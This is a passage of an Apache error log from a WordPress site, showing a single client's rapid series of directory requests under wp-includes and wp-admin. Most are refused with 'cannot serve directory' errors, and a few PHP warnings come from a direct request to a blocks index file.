/home/investig/public_html/wp-includes/Text/Diff/Engine/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com [Mon Jun 17 20:36:21.363242 2024] [autoindex:error] [pid 23586:tid 140029221304064] [client 167.71.215.152:45988] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/block-patterns/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com [Mon Jun 17 20:36:21.983137 2024] [autoindex:error] [pid 23586:tid 140029296838400] [client 167.71.215.152:45990] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/Text/Diff/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com [Mon Jun 17 20:36:22.692233 2024] [autoindex:error] [pid 22976:tid 140029389158144] [client 167.71.215.152:45992] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/block-supports/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com [Mon Jun 17 20:36:23.810780 2024] [:error] [pid 22976:tid 140029229696768] [client 167.71.215.152:45994] PHP Warning: Use of undefined constant ABSPATH - assumed 'ABSPATH' (this will throw an Error in a future version of PHP) in /home/investig/public_html/wp-includes/blocks/index.php on line 9, referer: www.google.com [Mon Jun 17 20:36:23.811061 2024] [:error] [pid 22976:tid 140029229696768] [client 167.71.215.152:45994] PHP Warning: Use of undefined constant WPINC - assumed 'WPINC' (this will throw an Error in a future version of PHP) in /home/investig/public_html/wp-includes/blocks/index.php on line 9, referer: www.google.com [Mon Jun 17 20:36:23.811228 2024] [:error] [pid 22976:tid 140029229696768] [client 167.71.215.152:45994] PHP Warning: require(ABSPATHWPINC/blocks/archives.php): failed to open stream: No such file or directory in /home/investig/public_html/wp-includes/blocks/index.php on line 9, referer: www.google.com [Mon Jun 17 20:36:23.811420 2024] [:error] [pid 22976:tid 140029229696768] [client 167.71.215.152:45994] PHP Fatal error: require(): Failed opening required 'ABSPATHWPINC/blocks/archives.php' (include_path='.:/usr/local/lib/php') in /home/investig/public_html/wp-includes/blocks/index.php on line 9, referer: www.google.com [Mon Jun 17 20:36:24.494021 2024] [autoindex:error] [pid 23586:tid 140029372372736] [client 167.71.215.152:45996] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/certificates/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com [Mon Jun 17 20:36:25.080433 2024] [autoindex:error] [pid 22975:tid 140029313623808] [client 167.71.215.152:45998] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/SimplePie/Cache/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com [Mon Jun 17 20:36:26.008669 2024] [autoindex:error] [pid 22974:tid 140029372372736] [client 167.71.215.152:46000] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/SimplePie/Content/Type/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com [Mon Jun 17 20:36:26.671937 2024] [autoindex:error] [pid 22976:tid 140029238089472] [client 167.71.215.152:46002] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com [Mon Jun 17 20:36:27.601035 2024] [autoindex:error] [pid 22976:tid 140029288445696] [client 167.71.215.152:46004] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/SimplePie/Content/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com [Mon Jun 17 20:36:28.504869 2024] [autoindex:error] [pid 22976:tid 140029355587328] [client 167.71.215.152:46008] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/rest-api/endpoints/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com [Mon Jun 17 20:36:29.107924 2024] [autoindex:error] [pid 23586:tid 140029380765440] [client 167.71.215.152:46010] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/rest-api/fields/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com [Mon Jun 17 20:36:29.964534 2024] [autoindex:error] [pid 23586:tid 140029246482176] [client 167.71.215.152:46012] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/Requests/Cookie/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com [Mon Jun 17 20:36:30.762157 2024] [autoindex:error] [pid 23586:tid 140029322016512] [client 167.71.215.152:46014] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/Requests/Proxy/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com [Mon Jun 17 20:36:31.264006 2024] [autoindex:error] [pid 22974:tid 140029338801920] [client 167.71.215.152:46016] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/Requests/Response/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com [Mon Jun 17 20:36:31.966941 2024] [autoindex:error] [pid 22975:tid 140029414336256] [client 167.71.215.152:46018] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/Requests/Transport/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com [Mon Jun 17 20:36:32.577201 2024] [autoindex:error] [pid 22976:tid 140029380765440] [client 167.71.215.152:46020] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/Requests/Utility/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com [Mon Jun 17 20:36:33.160891 2024] [autoindex:error] [pid 22974:tid 140029389158144] [client 167.71.215.152:46022] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/codemirror/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com [Mon Jun 17 20:36:34.162270 2024] [autoindex:error] [pid 22974:tid 140029280052992] [client 167.71.215.152:46024] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/Requests/Exception/HTTP/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com [Mon Jun 17 20:36:34.976249 2024] [autoindex:error] [pid 22974:tid 140029246482176] [client 167.71.215.152:46026] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/crop/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com [Mon Jun 17 20:36:35.568373 2024] [autoindex:error] [pid 22974:tid 140029405943552] [client 167.71.215.152:46028] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/images/crystal/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com [Mon Jun 17 20:36:36.271150 2024] [autoindex:error] [pid 22974:tid 140029305231104] [client 167.71.215.152:46030] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/images/media/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com [Mon Jun 17 20:36:36.962119 2024] [autoindex:error] [pid 22974:tid 140029221304064] [client 167.71.215.152:46032] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/images/smilies/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com [Mon Jun 17 20:36:37.610621 2024] [autoindex:error] [pid 22975:tid 140029347194624] [client 167.71.215.152:46034] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/images/wlw/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com [Mon Jun 17 20:36:38.304091 2024] [autoindex:error] [pid 23586:tid 140029305231104] [client 167.71.215.152:46036] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/rest-api/search/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com [Mon Jun 17 20:36:38.863417 2024] [autoindex:error] [pid 23586:tid 140029338801920] [client 167.71.215.152:46038] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/Requests/Exception/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com [Mon Jun 17 20:36:39.690934 2024] [autoindex:error] [pid 23586:tid 140029238089472] [client 167.71.215.152:46040] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/Requests/Auth/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com [Mon Jun 17 20:36:40.270021 2024] [autoindex:error] [pid 23586:tid 140029405943552] [client 167.71.215.152:46042] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/sodium_compat/src/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com [Mon Jun 17 20:36:40.900115 2024] [autoindex:error] [pid 23586:tid 140029355587328] [client 167.71.215.152:46044] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/sitemaps/providers/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com [Mon Jun 17 20:36:43.205465 2024] [autoindex:error] [pid 22976:tid 140029330409216] [client 167.71.215.152:46048] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/customize/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com [Mon Jun 17 20:36:44.195522 2024] [autoindex:error] [pid 22974:tid 140029347194624] [client 167.71.215.152:46050] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/fonts/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com [Mon Jun 17 20:36:48.765183 2024] [autoindex:error] [pid 22974:tid 140029322016512] [client 167.71.215.152:46054] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/ID3/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com [Mon Jun 17 20:36:49.494765 2024] [autoindex:error] [pid 22974:tid 140029296838400] [client 167.71.215.152:46056] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com [Mon Jun 17 20:36:50.064369 2024] [autoindex:error] [pid 23586:tid 140029422728960] [client 167.71.215.152:46058] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/IXR/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com [Mon Jun 17 20:36:50.667608 2024] [autoindex:error] [pid 22975:tid 140029330409216] [client 167.71.215.152:46060] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com [Mon Jun 17 20:36:51.481353 2024] [autoindex:error] [pid 22975:tid 140029271660288] [client 167.71.215.152:46062] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/php-compat/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com [Mon Jun 17 20:36:52.463534 2024] [autoindex:error] [pid 22974:tid 140029414336256] [client 167.71.215.152:46064] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/PHPMailer/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com [Mon Jun 17 20:36:53.061405 2024] [autoindex:error] [pid 22975:tid 140029246482176] [client 167.71.215.152:46066] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/pomo/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com [Mon Jun 17 20:36:53.665416 2024] [autoindex:error] [pid 22975:tid 140029221304064] [client 167.71.215.152:46068] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/random_compat/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com [Mon Jun 17 20:36:54.269346 2024] [autoindex:error] [pid 22975:tid 140029288445696] [client 167.71.215.152:46070] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/Requests/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com [Mon Jun 17 20:36:54.907861 2024] [autoindex:error] [pid 23586:tid 140029397550848] [client 167.71.215.152:46072] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/rest-api/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com [Mon Jun 17 20:36:55.568704 2024] [autoindex:error] [pid 22976:tid 140029305231104] [client 167.71.215.152:46074] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/SimplePie/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com [Mon Jun 17 20:36:56.191268 2024] [autoindex:error] [pid 23586:tid 140029271660288] [client 167.71.215.152:46076] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/sitemaps/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com [Mon Jun 17 20:36:56.869781 2024] [autoindex:error] [pid 23586:tid 140029330409216] [client 167.71.215.152:46078] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/sodium_compat/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com [Mon Jun 17 20:36:59.961013 2024] [autoindex:error] [pid 22976:tid 140029254874880] [client 167.71.215.152:46086] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/Text/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com [Mon Jun 17 20:37:00.864504 2024] [autoindex:error] [pid 23586:tid 140029389158144] [client 167.71.215.152:46088] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/theme-compat/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com [Mon Jun 17 20:37:01.462502 2024] [autoindex:error] [pid 22975:tid 140029338801920] [client 167.71.215.152:46090] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/widgets/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com [Mon Jun 17 20:37:02.011565 2024] [autoindex:error] [pid 22974:tid 140029422728960] [client 167.71.215.152:46092] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/ectoplasm/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com [Mon Jun 17 20:37:02.896661 2024] [autoindex:error] [pid 22974:tid 140029254874880] [client 167.71.215.152:46094] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com [Mon Jun 17 20:37:21.090504 2024] [autoindex:error] [pid 22976:tid 140029313623808] [client 167.71.215.152:46116] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com [Mon Jun 17 20:37:21.967140 2024] [autoindex:error] [pid 22976:tid 140029263267584] [client 167.71.215.152:46118] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/pomo/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com [Mon Jun 17 20:37:22.571694 2024] [autoindex:error] [pid 22976:tid 140029405943552] [client 167.71.215.152:46120] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/rest-api/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com [Mon Jun 17 20:37:23.495242 2024] [autoindex:error] [pid 22976:tid 140029246482176] [client 167.71.215.152:46122] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/widgets/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com [Mon Jun 17 20:37:24.268967 2024] [autoindex:error] [pid 22976:tid 140029296838400] [client 167.71.215.152:46124] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com [Mon Jun 17 20:37:24.883092 2024] [autoindex:error] [pid 22976:tid 140029414336256] [client 167.71.215.152:46126] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com [Mon Jun 17 20:37:25.681622 2024] [autoindex:error] [pid 22976:tid 140029280052992] [client 167.71.215.152:46128] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/maint/: No matching DirectoryIndex 